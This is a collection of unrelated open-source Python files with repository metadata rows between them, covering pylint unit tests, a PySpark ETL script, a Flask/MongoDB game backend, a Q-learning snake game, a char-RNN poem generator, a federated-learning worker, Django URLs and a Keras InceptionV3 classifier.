self.assertEqual(self.linter.report_is_enabled('RP0001'), True)
def test_report_output_format_aliased(self):
text.register(self.linter)
self.linter.set_option('output-format', 'text')
self.assertEqual(self.linter.reporter.__class__.__name__, 'TextReporter')
def test_report_output_format_custom(self):
this_module = sys.modules[__name__]
class TestReporter(object):
pass
this_module.TestReporter = TestReporter
class_name = ".".join((this_module.__name__, 'TestReporter'))
self.linter.set_option('output-format', class_name)
self.assertEqual(self.linter.reporter.__class__.__name__, 'TestReporter')
def test_set_option_1(self):
linter = self.linter
linter.set_option('disable', 'C0111,W0234')
self.assertFalse(linter.is_message_enabled('C0111'))
self.assertFalse(linter.is_message_enabled('W0234'))
self.assertTrue(linter.is_message_enabled('W0113'))
self.assertFalse(linter.is_message_enabled('missing-docstring'))
self.assertFalse(linter.is_message_enabled('non-iterator-returned'))
def test_set_option_2(self):
linter = self.linter
linter.set_option('disable', ('C0111', 'W0234') )
self.assertFalse(linter.is_message_enabled('C0111'))
self.assertFalse(linter.is_message_enabled('W0234'))
self.assertTrue(linter.is_message_enabled('W0113'))
self.assertFalse(linter.is_message_enabled('missing-docstring'))
self.assertFalse(linter.is_message_enabled('non-iterator-returned'))
def test_enable_checkers(self):
self.linter.disable('design')
self.assertFalse('design' in [c.name for c in self.linter.prepare_checkers()])
self.linter.enable('design')
self.assertTrue('design' in [c.name for c in self.linter.prepare_checkers()])
def test_errors_only(self):
linter = self.linter
self.linter.error_mode()
checkers = self.linter.prepare_checkers()
checker_names = set(c.name for c in checkers)
should_not = set(('design', 'format', 'metrics',
'miscellaneous', 'similarities'))
self.assertSetEqual(set(), should_not & checker_names)
def test_disable_similar(self):
self.linter.set_option('disable', 'RP0801')
self.linter.set_option('disable', 'R0801')
self.assertFalse('similarities' in [c.name for c in self.linter.prepare_checkers()])
def test_disable_alot(self):
"""check that we disabled a lot of checkers"""
self.linter.set_option('reports', False)
self.linter.set_option('disable', 'R,C,W')
checker_names = [c.name for c in self.linter.prepare_checkers()]
for cname in ('design', 'metrics', 'similarities'):
self.assertFalse(cname in checker_names, cname)
def test_addmessage(self):
self.linter.set_reporter(TestReporter())
self.linter.open()
self.linter.set_current_module('0123')
self.linter.add_message('C0301', line=1, args=(1, 2))
self.linter.add_message('line-too-long', line=2, args=(3, 4))
self.assertEqual(
['C: 1: Line too long (1/2)', 'C: 2: Line too long (3/4)'],
self.linter.reporter.messages)
def test_init_hooks_called_before_load_plugins(self):
self.assertRaises(RuntimeError,
Run, ['--load-plugins', 'unexistant', '--init-hook', 'raise RuntimeError'])
self.assertRaises(RuntimeError,
Run, ['--init-hook', 'raise RuntimeError', '--load-plugins', 'unexistant'])
def test_analyze_explicit_script(self):
self.linter.set_reporter(TestReporter())
self.linter.check(os.path.join(os.path.dirname(__file__), 'data', 'ascript'))
self.assertEqual(
['C: 2: Line too long (175/100)'],
self.linter.reporter.messages)
def test_html_reporter_missing_files(self):
output = six.StringIO()
with catch_warnings():
self.linter.set_reporter(html.HTMLReporter(output))
self.linter.set_option('output-format', 'html')
self.linter.check('troppoptop.py')
self.linter.generate_reports()
value = output.getvalue()
self.assertIn('troppoptop.py', value)
self.assertIn('fatal', value)
def test_python3_checker_disabled(self):
checker_names = [c.name for c in self.linter.prepare_checkers()]
self.assertNotIn('python3', checker_names)
self.linter.set_option('enable', 'python3')
checker_names = [c.name for c in self.linter.prepare_checkers()]
self.assertIn('python3', checker_names)
class ConfigTC(unittest.TestCase):
def setUp(self):
os.environ.pop('PYLINTRC', None)
def test_pylint_home(self):
uhome = os.path.expanduser('~')
if uhome == '~':
expected = '.pylint.d'
else:
expected = os.path.join(uhome, '.pylint.d')
self.assertEqual(config.PYLINT_HOME, expected)
try:
pylintd = join(tempfile.gettempdir(), '.pylint.d')
os.environ['PYLINTHOME'] = pylintd
try:
reload_module(config)
self.assertEqual(config.PYLINT_HOME, pylintd)
finally:
try:
os.remove(pylintd)
except:
pass
finally:
del os.environ['PYLINTHOME']
def test_pylintrc(self):
with fake_home():
try:
self.assertEqual(config.find_pylintrc(), None)
os.environ['PYLINTRC'] = join(tempfile.gettempdir(),
'.pylintrc')
self.assertEqual(config.find_pylintrc(), None)
os.environ['PYLINTRC'] = '.'
self.assertEqual(config.find_pylintrc(), None)
finally:
reload_module(config)
def test_pylintrc_parentdir(self):
with tempdir() as chroot:
create_files(['a/pylintrc', 'a/b/__init__.py', 'a/b/pylintrc',
'a/b/c/__init__.py', 'a/b/c/d/__init__.py',
'a/b/c/d/e/.pylintrc'])
with fake_home():
self.assertEqual(config.find_pylintrc(), None)
results = {'a' : join(chroot, 'a', 'pylintrc'),
'a/b' : join(chroot, 'a', 'b', 'pylintrc'),
'a/b/c' : join(chroot, 'a', 'b', 'pylintrc'),
'a/b/c/d' : join(chroot, 'a', 'b', 'pylintrc'),
'a/b/c/d/e' : join(chroot, 'a', 'b', 'c', 'd', 'e', '.pylintrc'),
}
for basedir, expected in results.items():
os.chdir(join(chroot, basedir))
self.assertEqual(config.find_pylintrc(), expected)
def test_pylintrc_parentdir_no_package(self):
with tempdir() as chroot:
with fake_home():
create_files(['a/pylintrc', 'a/b/pylintrc', 'a/b/c/d/__init__.py'])
self.assertEqual(config.find_pylintrc(), None)
results = {'a' : join(chroot, 'a', 'pylintrc'),
'a/b' : join(chroot, 'a', 'b', 'pylintrc'),
'a/b/c' : None,
'a/b/c/d' : None,
}
for basedir, expected in results.items():
os.chdir(join(chroot, basedir))
self.assertEqual(config.find_pylintrc(), expected)
class PreprocessOptionsTC(unittest.TestCase):
def _callback(self, name, value):
self.args.append((name, value))
def test_value_equal(self):
self.args = []
preprocess_options(['--foo', '--bar=baz', '--qu=ux'],
{'foo' : (self._callback, False),
'qu' : (self._callback, True)})
self.assertEqual(
[('foo', None), ('qu', 'ux')], self.args)
def test_value_space(self):
self.args = []
preprocess_options(['--qu', 'ux'],
{'qu' : (self._callback, True)})
self.assertEqual(
[('qu', 'ux')], self.args)
def test_error_missing_expected_value(self):
self.assertRaises(
ArgumentPreprocessingError,
preprocess_options,
['--foo', '--bar', '--qu=ux'],
{'bar' : (None, True)})
self.assertRaises(
ArgumentPreprocessingError,
preprocess_options,
['--foo', '--bar'],
{'bar' : (None, True)})
def test_error_unexpected_value(self):
self.assertRaises(
ArgumentPreprocessingError,
preprocess_options,
['--foo', '--bar=spam', '--qu=ux'],
{'bar' : (None, False)})
class MessagesStoreTC(unittest.TestCase):
def setUp(self):
self.store = MessagesStore()
class Checker(object):
name = 'achecker'
msgs = {
'W1234': ('message', 'msg-symbol', 'msg description.',
{'old_names': [('W0001', 'old-symbol')]}),
'E1234': ('Duplicate keyword argument %r in %s call',
'duplicate-keyword-arg',
'Used when a function call passes the same keyword argument multiple times.',
{'maxversion': (2, 6)}),
}
self.store.register_messages(Checker())
def _compare_messages(self, desc, msg, checkerref=False):
self.assertMultiLineEqual(desc, msg.format_help(checkerref=checkerref))
def test_check_message_id(self):
self.assertIsInstance(self.store.check_message_id('W1234'),
MessageDefinition)
self.assertRaises(UnknownMessage,
self.store.check_message_id, 'YB12')
def test_message_help(self):
msg = self.store.check_message_id('W1234')
self._compare_messages(
''':msg-symbol (W1234): *message*
msg description. This message belongs to the achecker checker.''',
msg, checkerref=True)
self._compare_messages(
''':msg-symbol (W1234): *message*
msg description.''',
msg, checkerref=False)
def test_message_help_minmax(self):
# build the message manually to be python version independant
msg = self.store.check_message_id('E1234')
self._compare_messages(
''':duplicate-keyword-arg (E1234): *Duplicate keyword argument %r in %s call*
Used when a function call passes the same keyword argument multiple times.
This message belongs to the achecker checker. It can't be emitted when using
Python >= 2.6.''',
msg, checkerref=True)
self._compare_messages(
''':duplicate-keyword-arg (E1234): *Duplicate keyword argument %r in %s call*
Used when a function call passes the same keyword argument multiple times.
This message can't be emitted when using Python >= 2.6.''',
msg, checkerref=False)
def test_list_messages(self):
sys.stdout = six.StringIO()
try:
self.store.list_messages()
output = sys.stdout.getvalue()
finally:
sys.stdout = sys.__stdout__
# cursory examination of the output: we're mostly testing it completes
self.assertIn(':msg-symbol (W1234): *message*', output)
def test_add_renamed_message(self):
self.store.add_renamed_message('W1234', 'old-bad-name', 'msg-symbol')
self.assertEqual('msg-symbol',
self.store.check_message_id('W1234').symbol)
self.assertEqual('msg-symbol',
self.store.check_message_id('old-bad-name').symbol)
def test_renamed_message_register(self):
self.assertEqual('msg-symbol',
self.store.check_message_id('W0001').symbol)
self.assertEqual('msg-symbol',
self.store.check_message_id('old-symbol').symbol)
if __name__ == '__main__':
unittest.main()
| a0x8o/kafka | sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/test/unittest_lint.py | unittest_lint.py | py | 26,703 | python | en | code | 59 | github-code | 36 |
73119063784 | import unittest.mock as mock
def fun(service):
service.show()
service.name = "Hello"
s = service.get()
return s
m = mock.Mock()
m.get.return_value = 100
res = fun(m)
assert(m.show.called is True)
assert(res == 100)
| IlyaOrlov/PythonCourse2.0_September23 | Useful/for_lec_22/mock_simple_example.py | mock_simple_example.py | py | 236 | python | en | code | 2 | github-code | 36 |
24272755981 | # A string S of lowercase English letters is given. We want to partition this string into
# as many parts as possible so that each letter appears in at most one part, and return
# a list of integers representing the size of these parts.
def partition_labels(S):
last_index_dict = {c: i for i, c in enumerate(S)}
part_last_index = 0
count = 0
result = []
for i, c in enumerate(S):
part_last_index = max(part_last_index, last_index_dict[c])
count += 1
if i == part_last_index:
result.append(count)
count = 0
return result
print(partition_labels("ababcbacadefegdehijhklij")) | elainedo/python_practice | Array/PartitionLabels.py | PartitionLabels.py | py | 646 | python | en | code | 0 | github-code | 36 |
1274170578 | import csv
def line_message(line):
cs = line.rsplit(']', 1)
return cs[1]
def line_thread(line):
cs = line.rsplit(']', 1)
cols = cs[0].replace("]", "").split("[")
if(len(cols)>=5):
return cols[4]
return ""
def read_columns(lines):
cols = set()
for line in lines:
cols.add(line_thread(line))
return cols
def get_column(columns, column):
return list(columns).index(column)
def create_row(column, nbr_columns, message):
row = []
for i in range(0, nbr_columns):
if(i==column):
row.append(message)
else:
row.append('')
return row
with open('logs/basic-log.txt') as f, open('logs/basic-log.csv', 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile)
lines = f.readlines()
columns = read_columns(lines)
nbr_columns = len(columns)
for line in lines:
csvwriter.writerow(create_row(get_column(columns, line_thread(line)), nbr_columns, line_message(line)))
| ChristofferGreen/Forsoning | src/tools/spdtocsv.py | spdtocsv.py | py | 995 | python | en | code | 0 | github-code | 36 |
29500719773 | import json
from pyspark.sql import SparkSession
from pyspark.sql.functions import concat, col, lit, split, to_date, date_format
import os
import time
# Create a SparkSession
spark = SparkSession.builder.getOrCreate()
# Start the timer
start_time = time.time()
# Load the config file
with open('config.json') as f:
config = json.load(f)
#Check if the input_csv file exists and is in csv format
if 'input_csv' not in config or not config['input_csv'].endswith('.csv') or not os.path.exists(config['input_csv']):
print("No CSV file is selected or the file is invalid.")
exit()
# Load the DataFrame from the CSV file
df = spark.read.csv(config['input_csv'], header=True, inferSchema=True)
# Convert the DataFrame to a Parquet file
df.write.mode("overwrite").parquet('temp.parquet')
# Load the DataFrame from the Parquet file
df = spark.read.parquet('temp.parquet')
# Apply transformations
for transformation in config['transformations']:
if transformation['type'] == 'date_format':
df = df.withColumn(transformation['column'], to_date(col(transformation['column']), transformation['input_format']))
df = df.withColumn(transformation['column'], date_format(col(transformation['column']), transformation['output_format']))
elif transformation['type'] == 'concat':
df = df.withColumn(transformation['output_column'], concat(*[col(c) for c in transformation['columns']], lit(transformation['separator'])))
elif transformation['type'] == 'split':
split_col = split(df[transformation['column']], transformation['separator'])
for i, output_column in enumerate(transformation['output_columns']):
df = df.withColumn(output_column, split_col.getItem(i))
elif transformation['type'] == 'drop':
df = df.drop(transformation['column'])
# Get the total number of records
total_records = df.count()
# Print the total number of records
print("Total records: ", total_records)
# Save the transformed DataFrame to a new Parquet file
df.write.mode('overwrite').parquet(config['output_parquet'])
df = spark.read.parquet(config['output_parquet'])
df.show()
# End the timer
end_time = time.time()
# Calculate the elapsed time
elapsed_time = end_time - start_time
# Print the elapsed time
print("Time taken: {} seconds".format(elapsed_time))
| hari01008/Extract-Transform-Load-With-Mysql-and-Pyspark | transform.py | transform.py | py | 2,316 | python | en | code | 0 | github-code | 36 |
43163584792 | from flask import Flask
from flask_pymongo import PyMongo
from operator import itemgetter
from flask_login import LoginManager
import sys
# Initialize mongo db with app
app = Flask(__name__)
# mongodb_client = PyMongo(app, uri='mongodb://localhost:27017/todo_db')
mongodb_client = PyMongo(app, uri='mongodb://mongo:27017/todo_db')
db = mongodb_client.db
user_collection = db['users']
leaderboard = db['leaderboard']
rooms_collection = db['rooms']
lobby_collection = db['lobbies']
# add user as {'username' : username, 'wins' : '0', 'loss' : '0'}
def add_user(username, password):
record = {'username': username, 'password': password, 'wins': 0, 'loss': 0, 'draw': 0}
user_collection.insert_one(record)
leaderboard.insert_one({username: 0})
def check_for_user(username):
result = user_collection.find_one({'username': username})
if result is not None:
return result
else:
return None
def update_password(username, password):
user = user_collection.find_one({'username': username})
wins = user['wins']
losses = user['loss']
draws = user['draw']
new_record = {'$set': {'username': username, 'password': password, 'wins': wins, 'loss': losses, 'draw': draws}}
user_collection.update_one({'username': username}, new_record)
# add a win or loss to the users stats
def update_player_stats(username: str, stat_to_change: str, increment: int):
record = user_collection.find_one({'username': username})
wins = record['wins']
loss = record['loss']
draws = record['draw']
if stat_to_change == 'wins':
wins += increment
elif stat_to_change == 'loss':
loss += increment
elif stat_to_change == 'draw':
draws += increment
new_record = {'$set': {'username': username, 'wins': wins, 'loss': loss, 'draw': draws}}
user_collection.update_one({'username': username}, new_record)
update_leaderboard(record['username'])
# change users score to {'username' : username, 'score' : new_score}... or insert if not there
# score will be an integer that ranks the player based on # games played and W/L ratio
def update_leaderboard(username):
user = user_collection.find_one({'username': username})
old_record = leaderboard.find({})
old_score = None
for record in old_record:
data = record.popitem()
if data[0] == user['username']:
old_score = data[1]
games_played = user['wins'] + user['loss']
win_loss = user['wins'] - user['loss']
new_score = 0
if win_loss > 0:
new_score = games_played * win_loss
else:
new_score = games_played * 0.5
new_record = {'$set': {user['username']: new_score}}
leaderboard.update_one({user['username']: old_score}, new_record)
# returns a dictionary of form {rank : [score, username]}
def get_leaderboard():
records = leaderboard.find({})
record_list = []
# add all the users to a List of List to be sorted by score
for record in records:
item = record.popitem()
username = item[0]
score = int(item[1])
record_list.append([score, username])
sorted_list = sorted(record_list, key=itemgetter(0))
return_leaderboard = {}
rank = len(record_list)
for user in sorted_list:
return_leaderboard[rank] = user
rank -= 1
return return_leaderboard
def drop(collection):
collection.drop()
def assign_room(username, room):
record = {'username': username, 'room': room}
if get_users_room(username) is not None:
rooms_collection.update_one({'username': username}, {"$set": record})
else:
rooms_collection.insert_one(record)
def get_users_room(username):
return rooms_collection.find_one({'username': username})
def delete_rooms():
rooms_collection.delete_many({})
def create_lobby(lobby, username):
lobby_collection.insert_one({'lobby': lobby, 'user1': username})
def get_lobbies():
lobbies = list(lobby_collection.find({}))
ret_val = []
for lobby in lobbies:
ret_val.append(lobby.get('lobby'))
return ret_val
def get_lobby(username):
return lobby_collection.find_one({'user1': username})
def delete_lobby(lobby):
lobby_collection.delete_one({'lobby': lobby})
def delete_lobbies():
lobby_collection.delete_many({})
| rickyjorgensen2000/cse312 | flaskr/db.py | db.py | py | 4,316 | python | en | code | 0 | github-code | 36 |
3223594 | numero = int(input('Digite um número para testar se é primo: '))
def e_primo(n):
if n < 2:
return False
i=n//2
while i > 1:
if n%i == 0:
return False
i -= 1
return True
def imprimir_resultado(n):
if e_primo(n):
print(f'O número {n} é primo')
else:
print(f'O número {n} não é primo')
imprimir_resultado(numero) | Medeiros000/Estacio_estudo | Estudo_Python/Alura/Basico/Modulo_03/Teste_14_Primo.py | Teste_14_Primo.py | py | 396 | python | pt | code | 0 | github-code | 36 |
36627702709 | import random
import numpy as np
import pickle
# a copy of visualsnake.py but without the PyGame
class LearnSnake:
def __init__(self):
self.screen_width = 600
self.screen_height = 400
self.snake_size = 10
self.snake_speed = 15
self.snake_coords = []
self.snake_length = 1
self.dir = "right"
self.board = np.zeros((self.screen_height // self.snake_size, self.screen_width // self.snake_size))
self.game_close = False
self.x1 = self.screen_width / 2
self.y1 = self.screen_height / 2
self.r1, self.c1 = self.coords_to_index(self.x1, self.y1)
self.board[self.r1][self.c1] = 1
self.c_change = 1
self.r_change = 0
self.food_r, self.food_c = self.generate_food()
self.board[self.food_r][self.food_c] = 2
self.survived = 0
self.step()
def get_state(self):
head_r, head_c = self.snake_coords[-1]
state = []
state.append(int(self.dir == "left"))
state.append(int(self.dir == "right"))
state.append(int(self.dir == "up"))
state.append(int(self.dir == "down"))
state.append(int(self.food_r < head_r))
state.append(int(self.food_r > head_r))
state.append(int(self.food_c < head_c))
state.append(int(self.food_c > head_c))
state.append(self.is_unsafe(head_r + 1, head_c))
state.append(self.is_unsafe(head_r - 1, head_c))
state.append(self.is_unsafe(head_r, head_c + 1))
state.append(self.is_unsafe(head_r, head_c - 1))
return tuple(state)
def is_unsafe(self, r, c):
if self.valid_index(r, c):
if self.board[r][c] == 1:
return 1
return 0
else:
return 1
def get_dist(self, r1, c1, r2, c2):
return ((r2 - r1) ** 2 + (c2 - c1) ** 2) ** 0.5
def valid_index(self, r, c):
return 0 <= r < len(self.board) and 0 <= c < len(self.board[0])
def coords_to_index(self, x, y):
r = int(y // 10)
c = int(x // 10)
return (r, c)
def generate_food(self):
food_c = int(round(random.randrange(0, self.screen_width - self.snake_size) / 10.0))
food_r = int(round(random.randrange(0, self.screen_height - self.snake_size) / 10.0))
if self.board[food_r][food_c] != 0:
food_r, food_c = self.generate_food()
return food_r, food_c
def game_over(self):
return self.game_close
def step(self, action="None"):
if action == "None":
action = random.choice(["left", "right", "up", "down"])
else:
action = ["left", "right", "up", "down"][action]
reward = 0
if action == "left" and (self.dir != "right" or self.snake_length == 1):
self.c_change = -1
self.r_change = 0
self.dir = "left"
elif action == "right" and (self.dir != "left" or self.snake_length == 1):
self.c_change = 1
self.r_change = 0
self.dir = "right"
elif action == "up" and (self.dir != "down" or self.snake_length == 1):
self.r_change = -1
self.c_change = 0
self.dir = "up"
elif action == "down" and (self.dir != "up" or self.snake_length == 1):
self.r_change = 1
self.c_change = 0
self.dir = "down"
if self.c1 >= self.screen_width // self.snake_size or self.c1 < 0 or self.r1 >= self.screen_height // self.snake_size or self.r1 < 0:
self.game_close = True
self.c1 += self.c_change
self.r1 += self.r_change
self.snake_coords.append((self.r1, self.c1))
if self.valid_index(self.r1, self.c1):
self.board[self.r1][self.c1] = 1
if len(self.snake_coords) > self.snake_length:
rd, cd = self.snake_coords[0]
del self.snake_coords[0]
if self.valid_index(rd, cd):
self.board[rd][cd] = 0
for r, c in self.snake_coords[:-1]:
if r == self.r1 and c == self.c1:
self.game_close = True
if self.c1 == self.food_c and self.r1 == self.food_r:
self.food_r, self.food_c = self.generate_food()
self.board[self.food_r][self.food_c] = 2
self.snake_length += 1
reward = 1 # food eaten, so +1 reward
else:
rh1, ch1 = self.snake_coords[-1]
if len(self.snake_coords) == 1:
rh2, ch2 = rh1, ch1
else:
rh2, ch2 = self.snake_coords[-1]
# death = -10 reward
if self.game_close:
reward = -10
self.survived += 1
return self.get_state(), reward, self.game_close
# run game using given episode (from saved q tables)
# no visual - just returns snake length
def run_game(self, episode):
filename = f"pickle/{episode}.pickle"
with open(filename, 'rb') as file:
table = pickle.load(file)
current_length = 2
steps_unchanged = 0
while not self.game_over():
state = self.get_state()
action = np.argmax(table[state])
if steps_unchanged == 1000:
break
self.step(action)
if self.snake_length != current_length:
steps_unchanged = 0
current_length = self.snake_length
else:
steps_unchanged += 1
return self.snake_length
| techtribeyt/snake-q-learning | snake_no_visual.py | snake_no_visual.py | py | 5,834 | python | en | code | 1 | github-code | 36 |
29573142583 | import tensorflow as tf
from model import char_rnn
from utils import build_dataset
import numpy as np
start_token = 'B'
end_token = 'E'
model_dir = 'result/poem'
corpus_file = 'data/poems.txt'
lr = 0.0002
def to_word(predict, vocabs):
predict = predict[0]
predict /= np.sum(predict)
sample = np.random.choice(np.arange(len(predict)), p=predict)
if sample > len(vocabs):
return vocabs[-1]
else:
return vocabs[sample]
def gen_poem(begin_word):
batch_size = 1
print('## loading corpus from %s' % model_dir)
poems_vector, word_int_map, vocabularies = build_dataset(corpus_file)
input_data = tf.placeholder(tf.int32, [batch_size, None])
end_points = char_rnn(model='lstm', input_data=input_data, output_data=None, vocab_size=len(
vocabularies), rnn_size=128, num_layers=2, batch_size=64, learning_rate=lr)
saver = tf.train.Saver(tf.global_variables())
init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())
with tf.Session() as sess:
sess.run(init_op)
checkpoint = tf.train.latest_checkpoint(model_dir)
saver.restore(sess, checkpoint)
x = np.array([list(map(word_int_map.get, start_token))])
[predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],
feed_dict={input_data: x})
if begin_word:
word = begin_word
else:
word = to_word(predict, vocabularies)
poem_ = ''
i = 0
while word != end_token:
poem_ += word
i += 1
if i >= 24:
break
x = np.zeros((1, 1))
x[0, 0] = word_int_map[word]
[predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],
feed_dict={input_data: x, end_points['initial_state']: last_state})
word = to_word(predict, vocabularies)
return poem_
def pretty_print_poem(poem_):
poem_sentences = poem_.split('。')
for s in poem_sentences:
if s != '' and len(s) > 10:
print(s + '。')
if __name__ == '__main__':
begin_char = input('## please input the first character:')
poem = gen_poem(begin_char)
pretty_print_poem(poem_=poem) | yanqiangmiffy/char-rnn-writer | generate_poem.py | generate_poem.py | py | 2,358 | python | en | code | 83 | github-code | 36 |
15856967243 | from .worker import *
class WorkerMoon(Worker):
def __init__(self, conf):
super().__init__(conf)
def prepare_train(self):
self._prepare_train()
for i in range(self.models_buffer_len):
self.models_buffer[i].to(self.device)
def listen_to_master(self):
# listen to master, related to the function `_activate_selected_clients` in `master.py`.
msg = torch.zeros((4, self.conf.n_participated))
dist.broadcast(tensor=msg, src=0)
self.conf.graph.client_id, self.conf.graph.comm_round, self.n_local_epochs = (
msg[:3, self.conf.graph.rank - 1].to(int).cpu().numpy().tolist()
)
# once we receive the signal, we init for the local training.
self.arch, self.model = create_model.define_model(
self.conf, to_consistent_model=False, client_id=self.conf.graph.client_id
)
self.model_state_dict = self.model.state_dict()
self.model_tb = TensorBuffer(list(self.model_state_dict.values()))
self.models_buffer_len = msg[3][self.conf.graph.rank - 1].to(int).cpu().numpy().tolist()
self.metrics = create_metrics.Metrics(self.model, task="classification")
prev_model = copy.deepcopy(self.model).cpu()
self.prev_model = self._turn_off_grad(prev_model)
self.buffer_model_dicts = [self.prev_model.state_dict() for _ in range(self.models_buffer_len)]
self.buffer_model_tbs = [TensorBuffer(list(self.buffer_model_dicts[i].values())) for i in
range(self.models_buffer_len)]
self.models_buffer = [self.prev_model for _ in range(self.models_buffer_len)]
dist.barrier()
self.train_loader, _ = create_dataset.define_data_loader(
self.conf,
dataset=self.dataset["train"],
# localdata_id start from 0 to the # of clients - 1.
# client_id starts from 1 to the # of clients.
localdata_id=self.conf.graph.client_id - 1,
is_train=True,
data_partitioner=self.data_partitioner,
)
def recv_extra_info_from_master(self):
for i in range(self.models_buffer_len):
# old_buffer = copy.deepcopy(self.buffer_model_tbs[i].buffer)
dist.recv(self.buffer_model_tbs[i].buffer, src=0)
# new_buffer = copy.deepcopy(self.buffer_model_tbs[i].buffer)
self.buffer_model_tbs[i].unpack(self.buffer_model_dicts[i].values())
self.models_buffer[i].load_state_dict(self.buffer_model_dicts[i])
self.models_buffer[i] = self.models_buffer[i].to(self.device)
self.conf.logger.log(
f"Worker-{self.conf.graph.worker_id} (client-{self.conf.graph.client_id}) received the historical local model ({self.arch}) from Master."
)
dist.barrier()
def local_training_with_extra_calculate(self, loss, output, data_batch, feature):
if self.conf.distillation_coefficient == 0 or self.conf.graph.comm_round <= 1:
return loss
bsz = data_batch["target"].size(0)
teacher_feature, _ = self.init_model(data_batch["input"])
logits = self.similarity(feature, teacher_feature.detach()).reshape(-1, 1)
for i in range(self.models_buffer_len):
prev_feature, _ = self.models_buffer[i](data_batch["input"])
nega = self.similarity(feature, prev_feature.detach()).reshape(-1, 1)
logits = torch.cat((logits, nega), dim=1)
logits_max, _ = torch.max(logits, dim=1, keepdim=True)
logits = logits - logits_max.detach()
logits /= self.conf.temperature
labels = torch.zeros(bsz).to(self.device).long()
loss2 = self.conf.distillation_coefficient * self.criterion(logits, labels)
loss = loss + loss2
if self.tracker is not None:
self.tracker.update_local_metrics(
loss2.item(), -1, n_samples=bsz
)
return loss
def similarity(self, x1, x2):
sim = F.cosine_similarity(x1, x2, dim=-1)
return sim
| CGCL-codes/FedGKD | pcode/workers/worker_moon.py | worker_moon.py | py | 4,105 | python | en | code | 5 | github-code | 36 |
24347774605 | import requests as req
from lxml import html
from tqdm import tqdm
url = 'http://swf.com.tw/scrap/'
page = req.get(url)
dom = html.fromstring(page.text)
images = dom.xpath('//img/@src')
def download(url):
filename = url.split('/')[-1]
r = req.get(url, stream=True)
with open(filename, 'wb') as f:
for data in tqdm(r.iter_content(1024)):
f.write(data)
return filename
for img in images:
if not img.startswith('http'):
img = url + img
h = req.head(img)
MIME = h.headers['content-type']
# 確認回應OK
if (h.status_code == 200) and ('image' in MIME):
print('下載檔案網址:' + img)
filename = download(img)
print(filename + ' 檔案下載完畢!') | theoyu13/python3 | python程式設計入門/F9796/ch11/download_img.py | download_img.py | py | 787 | python | en | code | 0 | github-code | 36 |
13840387121 | from django.contrib import admin
from django.urls import path, include
from . import views
urlpatterns = [
path('joueur/',views.joueur, name="Joueur"),
path('club/',views.club,name="Club"),
path('player/',views.player,name="Player"),
path('',views.home, name="Home"),
path('affiche/',views.affiche_club, name="Affiche_club"),
path('affiche/',views.affiche_joueur, name="Affiche_joueur"),
path("affiche/<int:id>/",views.affiche_club),
path("affiche/<int:id>/",views.affiche_joueur),
path("traitement/", views.traitement_club, name="Traitement_club"),
path("traitement/", views.traitement_joueur, name="Traitement_joueur"),
path("/delete/<int:id>",views.delete_club, name="Delete_club"),
path("delete/<int:id>",views.delete_joueur, name="Delete_joueur"),
path("update/<int:id>",views.update_joueur, name="Update_joueur"),
path("update/<int:id>",views.update_club, name="Update_club"),
path("traitementupdate/<int:id>",views.traitementupdate_joueur, name="Traitementupdate_joueur"),
path("traitementupdate/<int:id>",views.traitementupdate_club, name="Traitementupdate_club"),
path('admin/', admin.site.urls),
]
| 2bFaycal/projet-django | foot/app/urls.py | urls.py | py | 1,182 | python | fr | code | 0 | github-code | 36 |
7043720148 | from keras.applications.inception_v3 import InceptionV3
from tensorflow.keras import layers, models, optimizers
INPUT_SHAPE_300_300 = (300, 300, 3)
def create_model(input_shape=INPUT_SHAPE_300_300, weights=None):
if weights is not None:
inception_base = InceptionV3(
weights=None, include_top=False, input_shape=input_shape
)
inception_base.load_weights(weights)
else:
inception_base = InceptionV3(
weights="imagenet", include_top=False, input_shape=input_shape
)
inception_base.trainable = False
model = models.Sequential(
[
inception_base,
layers.GlobalAveragePooling2D(),
layers.Dropout(0.3),
layers.Dense(1024, activation="relu"),
layers.Dropout(0.3),
layers.Dense(6, activation="softmax"),
]
)
model.compile(
loss="categorical_crossentropy",
optimizer=optimizers.nadam(lr=0.001),
metrics=["accuracy"],
)
return model
| SalmanRafiullah/garbage-classification | models/inception_v3.py | inception_v3.py | py | 1,034 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.